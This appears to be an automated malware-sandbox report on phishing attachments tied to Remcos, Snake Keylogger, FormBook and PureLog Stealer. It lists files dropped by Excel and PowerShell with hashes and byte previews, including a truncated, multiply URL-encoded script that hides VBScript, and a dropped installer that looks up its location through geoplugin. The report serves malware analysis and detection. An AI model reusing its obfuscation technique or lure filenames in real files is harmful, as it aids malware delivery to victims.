7dcce5b76c8b17472d024758970a406b | Gelato Italiano_74695.exe.exe | malicious | Unknown | 104.21.78.54, 172.67.216.244
 | dvswiftsend_240917122612_9331095243.docx.doc | malicious | Remcos | 104.21.78.54, 172.67.216.244
 | PO.xls | malicious | Remcos | 104.21.78.54, 172.67.216.244
 | FACTORY NEW PURCHASE ORDER.doc | malicious | Unknown | 104.21.78.54, 172.67.216.244
 | Shipping Document.docx.doc | malicious | Unknown | 104.21.78.54, 172.67.216.244
 | FACTORY NEW PURCHASE ORDER.doc | malicious | Unknown | 104.21.78.54, 172.67.216.244
 | Payment Advice.xls | malicious | Snake Keylogger | 104.21.78.54, 172.67.216.244
 | AGMETIGA zapytanie ofertowe.xls | malicious | PureLog Stealer | 104.21.78.54, 172.67.216.244
 | Purchase Inquiry-0012.xls | malicious | Unknown | 104.21.78.54, 172.67.216.244
 | QT2Q1292.xla.xlsx | malicious | FormBook | 104.21.78.54, 172.67.216.244

No context

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 15434
Entropy (8bit): 4.9923364673122546
Encrypted: false
SSDEEP: 384:OSwkjh4iUxTyu/OdB8za5UUp2VoGIpN6KQkj2yg:OSJh4iUxTyu/OdB8za5UUp2V3IpNBQks
MD5: 1BCBBB637772892265D51E406EF724C8
SHA1: E44F1C25553697B0649687F91DF3B88FE28DE4B4
SHA-256: 066A264619615C98DFE08329417C62FA4E5620EC4CA80FE51F0A0AE6E316DB4E
SHA-512: 7455B54D31D00E1D2868AFAD92D3E040F7E97F63ECC972C883147A28BF95FF75F5F3B83D01760B75DCBC0A9B2A1A8AB6B004C9E9A26FC0973565505722CDE20F
Malicious: false
                                                                            Preview:PSMODULECACHE.............3...C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX.psd1=.......Invoke-AU3MouseClick........Get-AU3MouseCursor........Set-AU3WinTrans........Get-AU3ControlText........Get-AU3StatusbarText........Set-AU3Clip........Set-AU3Option........Invoke-AU3RunWait........Invoke-AU3ControlClick........Set-AU3WinTitle........Show-AU3WinMinimizeAllUndo........Get-AU3WinPos........Disable-AU3Control........Get-AU3WinClassList........Move-AU3Control........Set-AU3ControlFocus........Invoke-AU3MouseDown........Wait-AU3WinNotActive........Assert-AU3WinExists........Set-AU3ControlText........Get-AU3WinHandle........Get-AU3ControlFocus........Send-AU3Key........Get-AU3WinClientSize........Invoke-AU3MouseClickDrag........Invoke-AU3ControlTreeView........Move-AU3Win........Assert-AU3IsAdmin........Invoke-AU3ControlListView........Invoke-AU3MouseUp........Set-AU3WinState........Wait-AU3Win........Get-AU3Clip........Invoke-AU3Shutdown........Show-AU3WinActivate........Get-AU3WinState..

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
                                                                            Preview:@...e...........................................................

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
Category: modified
Size (bytes): 118450
Entropy (8bit): 2.544351810400321
Encrypted: false
SSDEEP: 96:Ea+M73rNp6fEVNp60WU1Qgr8l+Qu3i9pNp6R6Np6Er5BfqVNp61AT:Ea+Q35puEnp08QgocyNpJpxCnpxT
MD5: C443D03E485232A860B726FC83593004
SHA1: 6B556D04962638694402D15B7FA24B6BD6B1D1F4
SHA-256: F99757C98007DA241258AE12EC0FD5083F0475A993CA6309811263AAD17D4661
SHA-512: 3A7201A36B2875C59DB6E41369F52C941CD5D0D51BF90FCA31ABF05F71C76A7D5A6305667649AE8D2F63A3951A44643402853C096B07143531EAA6F6C5BB7C34
Malicious: true
                                                                            Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CSCrIPT%252520LaNGuage%25253D%252522VbsCRiPt%252522%25253E%25250ADiM%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: dropped
Size (bytes): 990768
Entropy (8bit): 6.298838855552093
Encrypted: false
SSDEEP: 12288:5Ly0W0exb+S7/6eALmQXhts30QmskXnnAEkINz3WSVgl:5Ly05wCmQXw30Ek3AgNz3Sl
MD5: 450228D72F9F726B645C55BBBC6DB905
SHA1: B26075C51A4681F2FF7407188F5E9480545A7ACA
SHA-256: 9124D7696D2B94E7959933C3F7A8F68E61A5CE29CD5934A4D0379C2193B126BE
SHA-512: 4795D090447D237CBE1A044FFE78E8CD0C9BE358DF778673B4713EAB2C324056A7701D22B827B95B2413845089FA71AC81A4F47CC8BCDBABAD34845E64B4E090
Malicious: true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*......=3............@.................................7/....@..........................................................................................................................................................text...mb.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
File Type: JSON data
Category: dropped
Size (bytes): 962
Entropy (8bit): 5.013130376969173
Encrypted: false
SSDEEP: 12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
MD5: F61E5CC20FBBA892FF93BFBFC9F41061
SHA1: 36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
SHA-256: 28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
SHA-512: 5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
Malicious: false
                                                                            Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 5596528
Entropy (8bit): 2.9627880151323387
Encrypted: false
SSDEEP: 12288:Nft3bECFzKzjLBMc0GtIRabD8R1AZJBa5jB7gOaOGVIl00xh600msetQr00ujh60:N5ACi8BiJK+nIlDh6osetQrsjh60
MD5: C8FF65340D86E7546ED74F2AEA89FF70
SHA1: C3C02AC92015D94D4D68479DADB5CD110C6CF8C9
SHA-256: 58B91D40032E4C9C693DDACBA27C24C875EBBF2F9F6C9FFA7A10991FC1049C4C
SHA-512: 385060117D6AE29EAC9CD9B6F69E50DF6FD86A84095AA2FA4DC14F2F3AAA27E2A6FC8E6F0E03F4D53E3A5A1038EF639B53BD44188E943A830005176F201D5008
Malicious: false
                                                                            Preview:....l...............;............H...@.. EMF....peU.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                            Category:dropped
                                                                            Size (bytes):5596528
                                                                            Entropy (8bit):2.9627880151323387
                                                                            Encrypted:false
                                                                            SSDEEP:12288:Nft3bECFzKzjLBMc0GtIRabD8R1AZJBa5jB7gOaOGVIl00xh600msetQr00ujh60:N5ACi8BiJK+nIlDh6osetQrsjh60
                                                                            MD5:C8FF65340D86E7546ED74F2AEA89FF70
                                                                            SHA1:C3C02AC92015D94D4D68479DADB5CD110C6CF8C9
                                                                            SHA-256:58B91D40032E4C9C693DDACBA27C24C875EBBF2F9F6C9FFA7A10991FC1049C4C
                                                                            SHA-512:385060117D6AE29EAC9CD9B6F69E50DF6FD86A84095AA2FA4DC14F2F3AAA27E2A6FC8E6F0E03F4D53E3A5A1038EF639B53BD44188E943A830005176F201D5008
                                                                            Malicious:false
                                                                            Preview:....l...............;............H...@.. EMF....peU.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 07:53:31 2024, 1st section name ".debug$S"
                                                                            Category:dropped
                                                                            Size (bytes):1328
                                                                            Entropy (8bit):3.9836859999630745
                                                                            Encrypted:false
                                                                            SSDEEP:24:HBe9EurTIXYadHSwKdNWI+ycuZhNoakSEPNnqSqd:or2pJKd41uloa3EqSK
                                                                            MD5:2ABE9A3665514F3D31543353D687E35E
                                                                            SHA1:7977B21DBCACB46BEACFEAAE04B997CB82506A0C
                                                                            SHA-256:23D630AD82C50D657F2D665FC255B7A008C909D780D87D67C493F27876A3427A
                                                                            SHA-512:5AC212FC78B166A87E3048F433CEB41CF68B038759B8E4C01CEF318BCCE2CCAAE64A356AE63C732CB1D9D3102E52290A533D82FCE09A68F2896AEBE0FB9425D5
                                                                            Malicious:false
                                                                            Preview:L....X.f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP................[D..-..@$.....w...........4.......C:\Users\user\AppData\Local\Temp\RESA499.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.m.4.1.l.s.y.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 07:53:53 2024, 1st section name ".debug$S"
                                                                            Category:dropped
                                                                            Size (bytes):1328
                                                                            Entropy (8bit):4.0048887096256225
                                                                            Encrypted:false
                                                                            SSDEEP:24:Hae9E2UJOkEk+dH2YwKdNWI+ycuZhNOakSmPNnqSqd:a8kO+Kd41ulOa3aqSK
                                                                            MD5:757772D5E195886CBB8840BC84A3418F
                                                                            SHA1:711E6D880E20D43D9F3EE45C4ADB40962B198A18
                                                                            SHA-256:5A9D557EEA0A797C260E255446E0C2FAF9BEE34058583137424E873A6C9B3DC5
                                                                            SHA-512:E5063D9DF3D369699A3744D03E70B44A51E7D0CC068085C7EBB6D8DFE7C3B213ACDE1066BEE41F9402DCF987279426214718A3E3ADFDE320316BEF420197D03F
                                                                            Malicious:false
                                                                            Preview:L....Y.f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP....................J....`B..[C..........4.......C:\Users\user\AppData\Local\Temp\RESF72C.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.4.g.n.3.n.q.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Category:dropped
                                                                            Size (bytes):990768
                                                                            Entropy (8bit):6.298838855552093
                                                                            Encrypted:false
                                                                            SSDEEP:12288:5Ly0W0exb+S7/6eALmQXhts30QmskXnnAEkINz3WSVgl:5Ly05wCmQXw30Ek3AgNz3Sl
                                                                            MD5:450228D72F9F726B645C55BBBC6DB905
                                                                            SHA1:B26075C51A4681F2FF7407188F5E9480545A7ACA
                                                                            SHA-256:9124D7696D2B94E7959933C3F7A8F68E61A5CE29CD5934A4D0379C2193B126BE
                                                                            SHA-512:4795D090447D237CBE1A044FFE78E8CD0C9BE358DF778673B4713EAB2C324056A7701D22B827B95B2413845089FA71AC81A4F47CC8BCDBABAD34845E64B4E090
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*......=3............@.................................7/....@..........................................................................................................................................................text...mb.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                            Category:dropped
                                                                            Size (bytes):21037056
                                                                            Entropy (8bit):1.135593507029044
                                                                            Encrypted:false
                                                                            SSDEEP:24576:L91U91o2I+0mZ5lEHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:L9EXaLuHqqEXwPW+RHA6m1fN
                                                                            MD5:C698A770F47B37D90C65184622219B78
                                                                            SHA1:806C6DAE607CD36EBEF6338439214CF591EE7CE3
                                                                            SHA-256:9A9906A67F8BD549AEA26920296A6FE4534ECD706C11D9BAF46AD7DF7909D2C2
                                                                            SHA-512:0F0F031446F3951B8C61A24F5A3BF747EAF94867DDE9B2794197257911F4237EBE7B9766EFB836C8F09D753D61C97B8DBB7A0E25403DE544BDD86180A51B9EF3
                                                                            Malicious:false
                                                                            Preview:"...... ........................u..............................;:...{...7...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                            Category:dropped
                                                                            Size (bytes):21037056
                                                                            Entropy (8bit):1.135593507029044
                                                                            Encrypted:false
                                                                            SSDEEP:24576:L91U91o2I+0mZ5lEHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:L9EXaLuHqqEXwPW+RHA6m1fN
                                                                            MD5:C698A770F47B37D90C65184622219B78
                                                                            SHA1:806C6DAE607CD36EBEF6338439214CF591EE7CE3
                                                                            SHA-256:9A9906A67F8BD549AEA26920296A6FE4534ECD706C11D9BAF46AD7DF7909D2C2
                                                                            SHA-512:0F0F031446F3951B8C61A24F5A3BF747EAF94867DDE9B2794197257911F4237EBE7B9766EFB836C8F09D753D61C97B8DBB7A0E25403DE544BDD86180A51B9EF3
                                                                            Malicious:false
                                                                            Preview:"...... ........................u..............................;:...{...7...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                            Category:dropped
                                                                            Size (bytes):21037056
                                                                            Entropy (8bit):1.13548290037764
                                                                            Encrypted:false
                                                                            SSDEEP:24576:L91U91o2I+0mZ5lEHLeGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:L9EXaLQHqqEXwPW+RHA6m1fN
                                                                            MD5:778EB6EC5F2213033EA80861CE8E7BB3
                                                                            SHA1:DBE5A41153BF9A4720D9119075BEA801BE59E18A
                                                                            SHA-256:FDF7E937316ECA5F5433505A4751D76D7724DDD16ADEBBC0408944F76D170C27
                                                                            SHA-512:CF262D1182948A4A6F7B1F7595BFC4E9A66858B7433B4C4A1E38B8B4CD4A503A52CE76B041029BC82091CE509984AD20B44A0795E6CBF709B48BBB1EA4DD9700
                                                                            Malicious:false
                                                                            Preview:"...... ........................u..............................;:...{...7...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                            Category:dropped
                                                                            Size (bytes):21037056
                                                                            Entropy (8bit):1.13548290037764
                                                                            Encrypted:false
                                                                            SSDEEP:24576:L91U91o2I+0mZ5lEHLeGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:L9EXaLQHqqEXwPW+RHA6m1fN
                                                                            MD5:778EB6EC5F2213033EA80861CE8E7BB3
                                                                            SHA1:DBE5A41153BF9A4720D9119075BEA801BE59E18A
                                                                            SHA-256:FDF7E937316ECA5F5433505A4751D76D7724DDD16ADEBBC0408944F76D170C27
                                                                            SHA-512:CF262D1182948A4A6F7B1F7595BFC4E9A66858B7433B4C4A1E38B8B4CD4A503A52CE76B041029BC82091CE509984AD20B44A0795E6CBF709B48BBB1EA4DD9700
                                                                            Malicious:false
                                                                            Preview:"...... ........................u..............................;:...{...7...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                            Category:dropped
                                                                            Size (bytes):21037056
                                                                            Entropy (8bit):1.13548290037764
                                                                            Encrypted:false
                                                                            SSDEEP:24576:L91U91o2I+0mZ5lEHLeGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:L9EXaLQHqqEXwPW+RHA6m1fN
                                                                            MD5:778EB6EC5F2213033EA80861CE8E7BB3
                                                                            SHA1:DBE5A41153BF9A4720D9119075BEA801BE59E18A
                                                                            SHA-256:FDF7E937316ECA5F5433505A4751D76D7724DDD16ADEBBC0408944F76D170C27
                                                                            SHA-512:CF262D1182948A4A6F7B1F7595BFC4E9A66858B7433B4C4A1E38B8B4CD4A503A52CE76B041029BC82091CE509984AD20B44A0795E6CBF709B48BBB1EA4DD9700
                                                                            Malicious:false
                                                                            Preview:"...... ........................u..............................;:...{...7...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                            Category:dropped
                                                                            Size (bytes):21037056
                                                                            Entropy (8bit):1.13548290037764
                                                                            Encrypted:false
                                                                            SSDEEP:24576:L91U91o2I+0mZ5lEHLeGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:L9EXaLQHqqEXwPW+RHA6m1fN
                                                                            MD5:778EB6EC5F2213033EA80861CE8E7BB3
                                                                            SHA1:DBE5A41153BF9A4720D9119075BEA801BE59E18A
                                                                            SHA-256:FDF7E937316ECA5F5433505A4751D76D7724DDD16ADEBBC0408944F76D170C27
                                                                            SHA-512:CF262D1182948A4A6F7B1F7595BFC4E9A66858B7433B4C4A1E38B8B4CD4A503A52CE76B041029BC82091CE509984AD20B44A0795E6CBF709B48BBB1EA4DD9700
                                                                            Malicious:false
                                                                            Preview:"...... ........................u..............................;:...{...7...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview:..
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview:..
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview:..
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
